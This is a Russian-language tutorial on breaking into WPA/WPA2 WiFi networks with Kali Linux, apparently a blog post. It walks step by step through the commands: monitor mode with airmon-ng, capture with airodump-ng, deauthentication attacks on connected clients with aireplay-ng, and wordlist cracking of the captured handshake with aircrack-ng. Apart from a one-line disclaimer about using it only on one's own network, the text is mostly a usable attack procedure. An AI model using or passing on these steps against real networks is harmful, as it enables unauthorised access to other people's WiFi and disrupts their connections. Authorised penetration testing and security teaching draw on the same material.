Как взломать WPA / WPA2 WiFi с помощью Kali Linux?

Как взломать WPA / WPA2 WiFi с помощью Kali Linux?

Этичный Хакер

Взлом WiFi звучит действительно круто и интересно. Но на самом деле взломать wifi практически намного проще с хорошим списком слов. Но этот мировой список бесполезен до тех пор, пока мы не будем иметь ни малейшего представления о том, как на самом деле использовать этот список слов для взлома хэша. И прежде чем взломать хэш, нам действительно нужно его сгенерировать. Итак, ниже приведены эти шаги вместе с некоторыми хорошими списками слов для взлома WPA / WPA2 wifi.

Примечание: Используйте приведенные ниже методы только для образовательных / тестовых целей на вашем собственном wifi или с разрешения владельца. Не используйте это в злонамеренных целях.

Итак, загрузите Kali Linux. Откройте окно терминала. И выполните следующие действия.

ifconfig Шаг 1: (настройка интерфейса): для просмотра или изменения конфигурации сетевых интерфейсов в вашей системе.

ifconfig
ifconfig-linux-интерфейс-конфигурация

Здесь,

  • eth0: первый интерфейс Ethernet
  • l0: интерфейс обратной связи
  • wlan0: первый беспроводной сетевой интерфейс в системе. (Это то, что нам нужно.)

Шаг 2: Остановите текущие процессы, использующие интерфейс WiFi.

airmon-ng check kill
Остановить процесс, который использует wifi linux

Шаг 3: Запустить wlan0 в режиме монитора.

запуск airmon-ng wlan0
Пуск интерфейс

Шаг 4: Для просмотра всех сетей Wi-Fi вокруг вас.

airodump-ng wlan0mon
Просмотр всех WiFi-сетей

Здесь,

  • airodump-ng: для захвата пакетов
  • wlan0mon: имя интерфейса (это имя может отличаться на разных устройствах)

Нажмите Ctrl + C, чтобы остановить процесс, когда вы нашли целевую сеть.

Шаг 5: Для просмотра клиентов, подключенных к целевой сети.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w / root wlan0mon
Просмотр подключенных клиентов к цели

Здесь,

  • airodump-ng: для захвата пакетов
  • -c: Канал
  • –bssid: MAC-адрес беспроводной точки доступа (WAP).
  • -w: Каталог, в котором вы хотите сохранить файл (файл пароля).
  • wlan0mon: название интерфейса.

Шаг 6: Откройте новое окно терминала, чтобы отключить клиентов, подключенных к целевой сети.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon
  • aireplay-ng: для ввода фреймов
  • -0: для деаутентификации
  • 10: Количество отправляемых пакетов деаутентификации
  • -a: для bssid целевой сети
  • wlan0mon: название интерфейса.

Когда клиент отключен от целевой сети. Он пытается повторно подключиться к сети, и когда он это сделает, вы получите нечто, называемое рукопожатием WPA, в предыдущем окне терминала.

Теперь мы закончили с захватом пакетов. Итак, теперь вы можете закрыть окно терминала.

Шаг 7. Чтобы расшифровать пароль. Откройте приложение Files (Файлы).

Здесь,

hacking-01.cap - это нужный вам файл.

aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
  • aircrack-ng: программа для взлома ключей 802.11 WEP и WPA-PSK
  • -a: -a2 для WPA2 и -a для сети WPA
  • -b: BSSID целевой сети
  • -w: расположение файла списка слов
  • /root/hacking-01.cap : расположение файла cap

Вы можете загрузить файл общих паролей из Интернета, и если вы хотите создать свой собственный файл, вы можете использовать инструмент crunch


Report Page